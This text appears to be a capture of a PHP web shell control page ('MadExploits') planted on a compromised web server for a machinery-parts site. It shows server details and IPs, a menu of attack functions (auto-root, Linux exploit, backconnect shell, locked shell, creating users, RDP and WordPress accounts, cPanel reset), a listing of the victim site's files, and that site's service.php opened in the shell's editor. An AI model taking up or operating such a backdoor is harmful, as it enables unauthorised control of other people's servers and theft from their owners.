Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.222.191.57
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
pjmachinerypart.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
css2
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
js2
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
1Head.php
5.45
KB
-rwxr-xr-x
2HeadMenu - Copy.php
11.01
KB
-rwxr-xr-x
2HeadMenu.php
12.77
KB
-rwxr-xr-x
2banner.php
4.95
KB
-rwxr-xr-x
3Footer.php
13.11
KB
-rwxr-xr-x
4End.php
1.1
KB
-rwxr-xr-x
BBservice.php
3.2
KB
-rwxr-xr-x
Category_Machine.php
6.3
KB
-rwxr-xr-x
about_us.php
4.36
KB
-rwxr-xr-x
category.php
9.26
KB
-rwxr-xr-x
contact.php
3.87
KB
-rwxr-xr-x
detail.php
16.75
KB
-rwxr-xr-x
index.php
181
B
-rwxr-xr-x
portfolio.php
3.41
KB
-rwxr-xr-x
product.php
7.66
KB
-rwxr-xr-x
product_detail.php
9.74
KB
-rwxr-xr-x
service.php
3.51
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : service.php
<?PHP include '1Head.php'; include '2HeadMenu.php'; ?> <section class="banner_area" style="background: url(img/banner/single-page-banner3.jpg); background-size: cover"> <div class="container"> <div class="banner_inner_text"> <h4>PRODUCTS</h4> <!-- <ul> <li><a href="index.php">Home</a></li> <li><a href="product.php">Products</a></li> <li class="active"><a>Accuway</a></li> </ul> --> </div> </div> </section> <?PHP $SQL_Category = " SELECT ProductCategory_ID , ProductCategory_Name FROM product_category WHERE ProductCategory_ID != 13 "; $objQuery_Category = $objConnect->query($SQL_Category); while ($objResult_Category = mysqli_fetch_array($objQuery_Category)) { $ProductCategoryName = $objResult_Category["ProductCategory_Name"]; $ProductCategoryID = $objResult_Category["ProductCategory_ID"]; if($ProductCategoryID == 15){ $BG = "style='background: #e6e6e6;'"; }else{ $BG=""; } ?> <section class="feature_content" <?=$BG;?> > <div class="container"> <h2 style="text-align: center;"> <?=$ProductCategoryName;?> </h2> <hr> <?PHP $SQL_Product = " SELECT ProductCategory2_ID , ProductCategory_ID , ProductCategory2_Name , StatusProductCategory2_ID FROM product_category2 WHERE ProductCategory_ID = $ProductCategoryID LIMIT 6 "; $objQuery_Product = $objConnect->query($SQL_Product); ?> <div class="row"> <?PHP while ($objResult_Product = mysqli_fetch_array($objQuery_Product)) { $objResult_ProductName = $objResult_Product["ProductCategory2_Name"]; $ProductCategory2ID = $objResult_Product["ProductCategory2_ID"]; ?> <div class="col-md-4 col-sm-6"> <a href="Category.php?ID=<?=$ProductCategory2ID;?>&Name=<?=$objResult_ProductName;?>"> <div class="row no-gutters bg-light position-relative shadow-lg p-3 mb-5 bg-white rounded"> <div class="col-md-6 mb-md-0 p-md-4"> <img src="img/MACHINE.png" class="w-100" alt="MACHINE"> </div> <div class="col-md-6 position-static p-4 pl-md-0" style="padding-right: 0!important;padding-top: 10%!important;color: #014c11; "> <h5 class="mt-0"><?= $objResult_ProductName; ?></h5> </div> </div> </a> </div> <?PHP } ?> </div> </div> </section> <?PHP } ?> <?PHP include '3Footer.php'; include '4End.php'; ?>
Close